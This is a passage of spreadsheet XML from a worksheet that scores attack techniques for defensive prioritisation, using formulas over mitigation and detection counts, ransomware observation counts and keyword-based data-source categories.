        <v>68</v>
      </c>
      <c r="AA174" s="37">
        <v>0.68</v>
      </c>
      <c r="AB174" s="37">
        <v>0.68</v>
      </c>
      <c r="AC174" s="37"/>
      <c r="AD174" s="50" t="s">
        <v>632</v>
      </c>
      <c r="AE174" s="37" t="str" cm="1">
        <f t="array" ref="AE174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD174)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF174" s="37">
        <v>170</v>
      </c>
      <c r="AG174" s="37" t="str" cm="1">
        <f t="array" ref="AG174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD174)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH174" s="37">
        <v>170</v>
      </c>
      <c r="AI174" s="37" t="str" cm="1">
        <f t="array" ref="AI174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD174)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ174" s="37">
        <v>170</v>
      </c>
      <c r="AK174" s="37" t="str" cm="1">
        <f t="array" ref="AK174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD174)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL174" s="37">
        <v>170</v>
      </c>
      <c r="AM174" s="37" t="str" cm="1">
        <f t="array" ref="AM174">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD174)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN174" s="37">
        <v>0</v>
      </c>
      <c r="AO174" s="37">
        <v>2</v>
      </c>
      <c r="AP174" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ174" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>169.24943804761901</v>
      </c>
      <c r="AR174" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS174" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT174" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU17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8.1071160975056671</v>
      </c>
    </row>
    <row r="175" spans="1:47" ht="34">
      <c r="A175" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B175" s="37">
        <f t="shared" si="2"/>
        <v>280.52374428571426</v>
      </c>
      <c r="C175" s="37" t="s">
        <v>633</v>
      </c>
      <c r="D175" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E175" s="37" t="s">
        <v>634</v>
      </c>
      <c r="F175" s="37">
        <v>1</v>
      </c>
      <c r="G175" s="37">
        <v>1</v>
      </c>
      <c r="H175" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I175" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J175" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K175" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L175" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M175" s="37">
        <v>0</v>
      </c>
      <c r="N175" s="56">
        <v>0</v>
      </c>
      <c r="O175" s="56">
        <v>0</v>
      </c>
      <c r="P175" s="56">
        <v>0</v>
      </c>
      <c r="Q175" s="56">
        <v>1</v>
      </c>
      <c r="R175" s="57" t="s">
        <v>635</v>
      </c>
      <c r="S175" s="57">
        <v>17</v>
      </c>
      <c r="T175" s="57" t="s">
        <v>636</v>
      </c>
      <c r="U175" s="57">
        <v>15</v>
      </c>
      <c r="V175" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.30952371428571424</v>
      </c>
      <c r="W175" s="37">
        <v>32</v>
      </c>
      <c r="X175" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Y175" s="37">
        <v>0.58181799999999995</v>
      </c>
      <c r="Z175" s="37">
        <v>1</v>
      </c>
      <c r="AA175" s="37">
        <v>0.01</v>
      </c>
      <c r="AB175" s="37">
        <v>0.01</v>
      </c>
      <c r="AC175" s="37"/>
      <c r="AD175" s="50" t="s">
        <v>637</v>
      </c>
      <c r="AE175" s="37" t="str" cm="1">
        <f t="array" ref="AE175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF175" s="37">
        <v>171</v>
      </c>
      <c r="AG175" s="37" t="str" cm="1">
        <f t="array" ref="AG175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH175" s="37">
        <v>171</v>
      </c>
      <c r="AI175" s="37" t="str" cm="1">
        <f t="array" ref="AI175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD175)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ175" s="37">
        <v>171</v>
      </c>
      <c r="AK175" s="37" t="str" cm="1">
        <f t="array" ref="AK175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL175" s="37">
        <v>171</v>
      </c>
      <c r="AM175" s="37" t="str" cm="1">
        <f t="array" ref="AM175">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD175)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN175" s="37">
        <v>0</v>
      </c>
      <c r="AO175" s="37">
        <v>0</v>
      </c>
      <c r="AP175" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ175" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>93.507914761904757</v>
      </c>
      <c r="AR175" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS175" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT175" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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76" spans="1:47" ht="34">
      <c r="A176" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B176" s="37">
        <f t="shared" si="2"/>
        <v>206.69986876190478</v>
      </c>
      <c r="C176" s="37" t="s">
        <v>638</v>
      </c>
      <c r="D176" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E176" s="37" t="s">
        <v>639</v>
      </c>
      <c r="F176" s="37">
        <v>1</v>
      </c>
      <c r="G176" s="37">
        <v>1</v>
      </c>
      <c r="H176" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I176" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J176" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K176" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L176" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M176" s="37">
        <v>0</v>
      </c>
      <c r="N176" s="56">
        <v>0</v>
      </c>
      <c r="O176" s="56">
        <v>0</v>
      </c>
      <c r="P176" s="56">
        <v>2</v>
      </c>
      <c r="Q176" s="56">
        <v>0</v>
      </c>
      <c r="R176" s="57" t="s">
        <v>640</v>
      </c>
      <c r="S176" s="57">
        <v>9</v>
      </c>
      <c r="T176" s="57" t="s">
        <v>641</v>
      </c>
      <c r="U176" s="57">
        <v>11</v>
      </c>
      <c r="V176" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.19999980952380952</v>
      </c>
      <c r="W176" s="37">
        <v>20</v>
      </c>
      <c r="X176" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Y176" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Z176" s="37">
        <v>2</v>
      </c>
      <c r="AA176" s="37">
        <v>0.02</v>
      </c>
      <c r="AB176" s="37">
        <v>0.02</v>
      </c>
      <c r="AC176" s="37"/>
      <c r="AD176" s="50" t="s">
        <v>642</v>
      </c>
      <c r="AE176" s="37" t="str" cm="1">
        <f t="array" ref="AE176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD176)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF176" s="37">
        <v>172</v>
      </c>
      <c r="AG176" s="37" t="str" cm="1">
        <f t="array" ref="AG176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD176)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH176" s="37">
        <v>172</v>
      </c>
      <c r="AI176" s="37" t="str" cm="1">
        <f t="array" ref="AI176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD176)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ176" s="37">
        <v>172</v>
      </c>
      <c r="AK176" s="37" t="str" cm="1">
        <f t="array" ref="AK176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD176)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL176" s="37">
        <v>172</v>
      </c>
      <c r="AM176" s="37" t="str" cm="1">
        <f t="array" ref="AM176">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD176)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN176" s="37">
        <v>0</v>
      </c>
      <c r="AO176" s="37">
        <v>0</v>
      </c>
      <c r="AP176" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ176" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>68.899956253968256</v>
      </c>
      <c r="AR176" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS176" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT176" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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77" spans="1:47" ht="17">
      <c r="A177" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B177" s="37">
        <f t="shared" si="2"/>
        <v>214.50016500000001</v>
      </c>
      <c r="C177" s="37" t="s">
        <v>643</v>
      </c>
      <c r="D177" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E177" s="37" t="s">
        <v>644</v>
      </c>
      <c r="F177" s="37">
        <v>1</v>
      </c>
      <c r="G177" s="37">
        <v>1</v>
      </c>
      <c r="H177" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I177" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J177" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K177" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L177" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M177" s="37">
        <v>0</v>
      </c>
      <c r="N177" s="56">
        <v>0</v>
      </c>
      <c r="O177" s="56">
        <v>1</v>
      </c>
      <c r="P177" s="56">
        <v>3</v>
      </c>
      <c r="Q177" s="56">
        <v>2</v>
      </c>
      <c r="R177" s="57" t="s">
        <v>645</v>
      </c>
      <c r="S177" s="57">
        <v>8</v>
      </c>
      <c r="T177" s="57" t="s">
        <v>641</v>
      </c>
      <c r="U177" s="57">
        <v>11</v>
      </c>
      <c r="V177" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20952404761904764</v>
      </c>
      <c r="W177" s="37">
        <v>19</v>
      </c>
      <c r="X177" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Y177" s="37">
        <v>0.34545500000000001</v>
      </c>
      <c r="Z177" s="37">
        <v>6</v>
      </c>
      <c r="AA177" s="37">
        <v>0.06</v>
      </c>
      <c r="AB177" s="37">
        <v>0.06</v>
      </c>
      <c r="AC177" s="37"/>
      <c r="AD177" s="50" t="s">
        <v>646</v>
      </c>
      <c r="AE177" s="37" t="str" cm="1">
        <f t="array" ref="AE177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF177" s="37">
        <v>173</v>
      </c>
      <c r="AG177" s="37" t="str" cm="1">
        <f t="array" ref="AG177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH177" s="37">
        <v>173</v>
      </c>
      <c r="AI177" s="37" t="str" cm="1">
        <f t="array" ref="AI177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD177)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ177" s="37">
        <v>173</v>
      </c>
      <c r="AK177" s="37" t="str" cm="1">
        <f t="array" ref="AK177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL177" s="37">
        <v>173</v>
      </c>
      <c r="AM177" s="37" t="str" cm="1">
        <f t="array" ref="AM177">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD177)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN177" s="37">
        <v>0</v>
      </c>
      <c r="AO177" s="37">
        <v>0</v>
      </c>
      <c r="AP177" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ177" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>71.500055000000003</v>
      </c>
      <c r="AR177" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS177" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT177" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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78" spans="1:47" ht="34">
      <c r="A178" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B178" s="37">
        <f t="shared" si="2"/>
        <v>229.01428571428576</v>
      </c>
      <c r="C178" s="37" t="s">
        <v>647</v>
      </c>
      <c r="D178" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E178" s="37" t="s">
        <v>648</v>
      </c>
      <c r="F178" s="37">
        <v>1</v>
      </c>
      <c r="G178" s="37">
        <v>1</v>
      </c>
      <c r="H178" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I178" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J178" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K178" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L178" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M178" s="37">
        <v>0</v>
      </c>
      <c r="N178" s="56">
        <v>0</v>
      </c>
      <c r="O178" s="56">
        <v>0</v>
      </c>
      <c r="P178" s="56">
        <v>1</v>
      </c>
      <c r="Q178" s="56">
        <v>3</v>
      </c>
      <c r="R178" s="57" t="s">
        <v>649</v>
      </c>
      <c r="S178" s="57">
        <v>13</v>
      </c>
      <c r="T178" s="57" t="s">
        <v>650</v>
      </c>
      <c r="U178" s="57">
        <v>9</v>
      </c>
      <c r="V178" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W178" s="37">
        <v>22</v>
      </c>
      <c r="X178" s="37">
        <v>0.4</v>
      </c>
      <c r="Y178" s="37">
        <v>0.4</v>
      </c>
      <c r="Z178" s="37">
        <v>4</v>
      </c>
      <c r="AA178" s="37">
        <v>0.04</v>
      </c>
      <c r="AB178" s="37">
        <v>0.04</v>
      </c>
      <c r="AC178" s="37"/>
      <c r="AD178" s="50" t="s">
        <v>651</v>
      </c>
      <c r="AE178" s="37" t="str" cm="1">
        <f t="array" ref="AE178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD178)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF178" s="37">
        <v>174</v>
      </c>
      <c r="AG178" s="37" t="str" cm="1">
        <f t="array" ref="AG178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD178)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH178" s="37">
        <v>174</v>
      </c>
      <c r="AI178" s="37" t="str" cm="1">
        <f t="array" ref="AI178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD178)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ178" s="37">
        <v>174</v>
      </c>
      <c r="AK178" s="37" t="str" cm="1">
        <f t="array" ref="AK178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD178)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL178" s="37">
        <v>174</v>
      </c>
      <c r="AM178" s="37" t="str" cm="1">
        <f t="array" ref="AM178">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD178)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN178" s="37">
        <v>0</v>
      </c>
      <c r="AO178" s="37">
        <v>0</v>
      </c>
      <c r="AP178" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ178" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>76.338095238095249</v>
      </c>
      <c r="AR178" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS178" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT178" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU17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79" spans="1:47" ht="51">
      <c r="A179" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B179" s="37">
        <f t="shared" si="2"/>
        <v>70.100000000000009</v>
      </c>
      <c r="C179" s="37" t="s">
        <v>652</v>
      </c>
      <c r="D179" s="50" t="s">
        <v>629</v>
      </c>
      <c r="E179" s="37" t="s">
        <v>653</v>
      </c>
      <c r="F179" s="37">
        <v>1</v>
      </c>
      <c r="G179" s="37">
        <v>1</v>
      </c>
      <c r="H179" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I179" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J179" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K179" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L179" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M179" s="37">
        <v>0</v>
      </c>
      <c r="N179" s="56">
        <v>0</v>
      </c>
      <c r="O179" s="56">
        <v>0</v>
      </c>
      <c r="P179" s="56">
        <v>0</v>
      </c>
      <c r="Q179" s="56">
        <v>0</v>
      </c>
      <c r="R179" s="57"/>
      <c r="S179" s="57"/>
      <c r="T179" s="57"/>
      <c r="U179" s="57"/>
      <c r="V179" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W179" s="37">
        <v>0</v>
      </c>
      <c r="X179" s="37">
        <v>0</v>
      </c>
      <c r="Y179" s="37">
        <v>0</v>
      </c>
      <c r="Z179" s="37">
        <v>0</v>
      </c>
      <c r="AA179" s="37">
        <v>0</v>
      </c>
      <c r="AB179" s="37">
        <v>0</v>
      </c>
      <c r="AC179" s="37"/>
      <c r="AD179" s="50" t="s">
        <v>654</v>
      </c>
      <c r="AE179" s="37" t="str" cm="1">
        <f t="array" ref="AE179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF179" s="37">
        <v>175</v>
      </c>
      <c r="AG179" s="37" t="str" cm="1">
        <f t="array" ref="AG179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH179" s="37">
        <v>175</v>
      </c>
      <c r="AI179" s="37" t="str" cm="1">
        <f t="array" ref="AI179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD179)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ179" s="37">
        <v>175</v>
      </c>
      <c r="AK179" s="37" t="str" cm="1">
        <f t="array" ref="AK179">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD179)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL179" s="37">
